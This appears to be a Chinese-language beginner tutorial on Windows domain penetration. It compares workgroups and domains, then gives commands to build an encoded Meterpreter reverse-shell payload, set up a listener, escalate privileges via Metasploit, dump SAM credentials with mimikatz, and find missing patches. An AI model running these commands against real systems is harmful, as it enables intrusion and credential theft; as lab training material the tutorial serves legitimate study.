域渗透入门

参考资料

录制的视频教程

首先搭一个域环境

工作组和域的区别

  1. 大小 工作组比较小,不超过20台。域用在比较大的网络,成百上千台。
  2. 拓扑图 工作组中,所有机器的地位是平等的,一台计算机可以自由的加入或退出一个工作组。
  3. 验证方式 在工作组中,用户名、密码存放在本地计算机。如果要登入其他计算机,必须提供用户名,密码;在域中,有一台域控(DC)服务器,其他计算机都要通过DC验证才能加入域。有域权限,可以登入任何域内计算机,无需知道计算机的账号也可以登入。
  4. 网络 工作组计算机必须在同一个子网中;域的计算机可以在不同的本地网络中。

获得一个shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
生成恶意载荷
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6678 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
---
设置监听器
handler -H 192.168.1.4 -P 6678 -p windows/meterpreter/reverse_tcp
---
反弹shell成功后,进行提权
sysinfo 		#查看windows是32位/64位
migrate         #如果是64位置,需要migrate到64位进程
search suggester
use 0
set session 1
run             #查找可以利用的exp
use exploit/windows/local/always_install_elevated  #使用提权exp
set session 1

meterpreter mimikatz模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
      crypto	- Cryptographie et certificats
        hash	- Hash
      system	- Gestion syst�me
     process	- Manipulation des processus
      thread	- Manipulation des threads
     service	- Manipulation des services
   privilege	- Manipulation des privil�ges
      handle	- Manipulation des handles
 impersonate	- Manipulation tokens d'acc�s
     winmine	- Manipulation du d�mineur
 minesweeper	- Manipulation du d�mineur 7
       nogpo	- Anti-gpo et patchs divers
     samdump	- Dump de SAM   #导出sam密码
      inject	- Injecteur de librairies
          ts	- Terminal Server
      divers	- Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
    sekurlsa	- Dump des sessions courantes par providers LSASS
         efs	- Manipulations EFS

信息搜集-补丁查找

1
2
3
4
5
6
7
8
9
shell
cd C:\Windows\Temp
systeminfo > info.txt

---
pip install xlrd 
pip install xlrd -upgrade
python .\windows-exploit-suggester.py --update
python .\windows-exploit-suggester.py -d  2020-04-16-mssb.xls -i info.txt